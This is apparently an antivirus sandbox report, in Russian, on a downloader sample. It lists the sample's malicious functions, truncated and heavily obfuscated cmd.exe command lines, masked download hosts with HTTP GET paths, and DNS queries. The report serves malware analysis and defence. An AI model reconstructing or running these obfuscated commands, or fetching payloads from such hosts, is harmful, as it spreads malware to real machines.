Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c ^FOr ; , /^f , " tokens= 2 delims=Q=f0o" ; %c , ; ^in ; ; ( , ' , , A^^s^^S^^OC ; , .^^cmd ' , ) , ; D^O ; %c; ; vzE4iF6MC0/^V^Kf^m^bR^Z^w^ , 6Fri/^c " , ; ( (S^et ^ ^...
Сетевая активность
Подключается к
- 'il###gunu.com':80
- 'il###gunu.com':443
- 'kr##er.jp':80
- 'im###soft.co.uk':80
TCP
Запросы HTTP GET
- http://www.il###gunu.com/kFln/
- http://kr##er.jp/BGuXnV/
- http://im###soft.co.uk/MjjtX/
Другие
- 'il###gunu.com':443
UDP
- DNS ASK il###gunu.com
- DNS ASK uk######erresearch.co.uk
- DNS ASK kr##er.jp
- DNS ASK pa###ronik.de
- DNS ASK im###soft.co.uk
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ^FOr ; , /^f , " tokens= 2 delims=Q=f0o" ; %c , ; ^in ; ; ( , ' , , A^^s^^S^^OC ; , .^^cmd ' , ) , ; D^O ; %c; ; vzE4iF6MC0/^V^Kf^m^bR^Z^w^ , 6Fri/^c " , ; ( (S^et ^ ^...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c A^s^S^OC .^cmd
- '<SYSTEM32>\cmd.exe' ; ; vzE4iF6MC0/VKfmbRZw , 6Fri/c " , ; ( (S^et ^ ^ $_^@=d^S^ry^vVg$,^0}^:1^Oo^cGFN^-=5^wJujYU^ .Wi^)\^en^kP/bDa'^(^l{^hs;BL+^p@^xZM^zIXt8Q^AmfC) , )& , ; ^f^oR , , %^R ; ; in...
